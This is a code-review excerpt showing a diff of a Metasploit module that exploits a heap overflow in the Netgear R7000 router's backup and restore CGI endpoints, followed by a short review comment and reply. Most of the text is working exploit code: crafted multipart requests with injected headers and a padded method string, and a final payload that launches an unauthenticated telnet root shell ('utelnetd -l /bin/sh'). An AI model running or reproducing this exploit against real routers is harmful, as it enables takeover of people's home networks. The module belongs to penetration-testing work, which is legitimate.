modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.rb

```diff
@@ -0,0 +1,348 @@
+      'headers' => { 'Content-Disposition' => 'form-data', Rex::Text.rand_text_alpha(512) => Rex::Text.rand_text_alpha(9), 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}" },
+      'data' => send_data
+    })
+
+    if res.code != 200
+      fail_with(Failure::UnexpectedReply, 'The target R7000 router responded with a non 200 OK response on the eighth packet!')
+    end
+
+    post_data.parts[0].header.headers[0] = [Rex::Text.rand_text_alpha(19).to_s, "form-data; name=\"mtenRestoreCfg\"; filename=\"#{Rex::Text.rand_text_alpha(399)}\""]
+    post_data.parts[0].content = ''
+    send_data = post_data.to_s
+    send_data.sub!(/\r\n--#{post_data.bound}--\r\n/, Rex::Text.rand_text_alpha(1))
+
+    res = send_request_cgi({
+      'method' => "#{Rex::Text.rand_text_alpha(58746)}POST",
+      'uri' => normalize_uri('cgi-bin', "genie.cgi?backup.cgi\nContent-Length: 4156559"), # Note that we need this format for Content-Length otherwise the exploitation will fail, most likely due to a bad heap layout.
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'agent' => nil, # Disable sending the User-Agent header
+      'headers' => { 'Content-Disposition' => 'form-data', Rex::Text.rand_text_alpha(512) => Rex::Text.rand_text_alpha(9), 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}" },
+      'data' => send_data
+    })
+
+    if !res.nil?
+      fail_with(Failure::UnexpectedReply, 'The target R7000 router responded on the ninth packet!')
+    end
+
+    post_data.parts[0].header.headers[0] = ['Content-Disposition', "form-data; name=\"StringFilepload\"; filename=\"#{Rex::Text.rand_text_alpha(256)}\""]
+    post_data.parts[0].content = "\x48\x00\x00\x00#{"\x20" * 12}utelnetd -l /bin/sh#{"\x00" * 45}\x04\xe8\x00\x00"
+    send_data = post_data.to_s
+    send_data.sub!(/\r\n--#{post_data.bound}--\r\n/, '')
+
+    print_status('Sending 10th and final packet. The exploit should hang at this point.')
+    print_status("Connect to the telnet shell by running: telnet #{datastore['RHOST']}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/genierestore.cgi',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'agent' => nil, # Disable sending the User-Agent header
+      'headers' => { 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}\r\n#{Rex::Text.rand_text_alpha(512)}: #{Rex::Text.rand_text_alpha(9)}" },
+      'data' => send_data
+    })
+
+    if !res.nil?
+      fail_with(Failure::UnexpectedReply, 'The target R7000 router responded on the tenth packet!')
+    end
+
+    print_good('Exploit complete, connect to your shell!')
+  end
+
+  def run
+    firmware_version = retrieve_firmware_version
+
+    firmware_version = Rex::Version.new(firmware_version[1])
+    if firmware_version != Rex::Version.new('1.0.11.116')
+      print_error('Sorry but at this point in time only version 1.0.11.116 of the R7000 firmware is exploitable with this module!')
+      return
```

Comment:
This should be `fail_with(Failure::NoTarget, ...`.

Reply:
Fixed with https://github.com/rapid7/metasploit-framework/pull/15163/commits/a13f6a35dceb3f4ef479701e1d8ca67a83ee9357